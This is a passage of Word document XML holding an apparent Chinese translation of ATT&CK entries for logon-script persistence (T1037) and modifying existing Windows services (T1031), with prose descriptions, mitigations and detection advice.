          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>中，因此也应监视这些路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>异常或未知应用程序登录操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监视</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4996A0EE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00473BCD" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32A89757" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="0FB8C5D4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08C2A606" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1037</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E67D73F" w14:textId="20CE09F1" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>横向</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>移动，</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60B96606" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="438BE1BA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对系统或域登录脚本的写访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="685F6579" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC4C90C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId58" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-564</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E618F06" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E8A1807" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52C89F5B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许在特定用户或用户组登录系统时运行登录脚本。脚本可用于执行管理功能，这些功能通常可以执行其他程序或向内部日志服务器发送信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75964597" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果攻击者可以访问这些登录脚本，他们可能会在脚本中插入其他代码，以便在用户登录时执行他们的工具。如果使用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地脚本，通过插入</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>代码他们可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在单个系统上保持持久性；如果脚本存储在中央服务器上并推送到多个系统，通过插入</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>代码他们可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在网络中横向移动。根据登录脚本的访问配置，操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能需要本地凭据或管理员账号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F8A266" w14:textId="695E8B01" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只要特定用户登录或退出系统，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ac</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就允许以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用户运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录和注销</w:t>
      </w:r>
      <w:r w:rsidR="008069DA">
        <w:t>Hook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。用户登录时，登录</w:t>
      </w:r>
      <w:r w:rsidR="008069DA">
        <w:t>Hook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>告诉</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ac </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>OS X</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行某个脚本。但与启动项不同的是，登录</w:t>
      </w:r>
      <w:r w:rsidR="008069DA">
        <w:t>Hook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户执行。一次只能有一个登录</w:t>
      </w:r>
      <w:r w:rsidR="008069DA">
        <w:t>Hook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果攻击者可以访问这些脚本，他们可以在脚本中插入其他代码，以便在用户登录时执行他们的工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7AF64C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3114"/>
        <w:gridCol w:w="6622"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="69B0420B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3114" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7147BA3E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6622" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="67C0C772" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="7AB4BBF4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3114" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29E293D6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId59" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>文件和目录权限</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="744E4B89" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将登录脚本的写访问权限限制为特定管理员。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="029B8325" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2302CD87" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D937888" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控登录脚本来查看是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常用户的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或异常时间的访问。查找由正常管理职责之外的异常账号添加或修改的文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D83C4A2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修改现有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="1ED864A4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="231B62C7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1031</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CA943A8" w14:textId="52C93EBA" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34957C4B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65CE1140" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D78B372" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，文件监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A88E52C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId60" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-551</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40CC8AC6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Travis Smith</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Tripwire</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Matthew Demaske</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Adaptforward</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01F493D8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E99B0A2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191A2B85" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务配置信息（包括服务可执行文件或恢复程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令的文件路径）存储在注册表中。可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sc.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Reg</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等实用程序修改服务配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0439C0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用系统实用程序或自定义工具与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互来修改现有服务以便在系统上保留恶意软件。使用现有服务是一种伪装形式，可能会使检测分析更具挑战性。修改现有服务可能会中断其功能，或者可能启用已禁用或不常用的服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69284993" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者还可能故意破坏或终止服务，从而执行恶意恢复程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499B698A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
